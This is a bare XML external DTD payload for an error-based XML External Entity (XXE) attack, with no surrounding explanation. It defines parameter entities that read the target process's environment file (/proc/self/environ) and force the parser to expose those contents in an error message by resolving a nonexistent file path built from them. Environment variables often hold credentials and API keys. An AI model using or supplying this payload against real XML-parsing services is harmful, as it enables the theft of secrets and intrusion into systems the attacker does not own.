<!ENTITY % file SYSTEM "file:///proc/self/environ">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
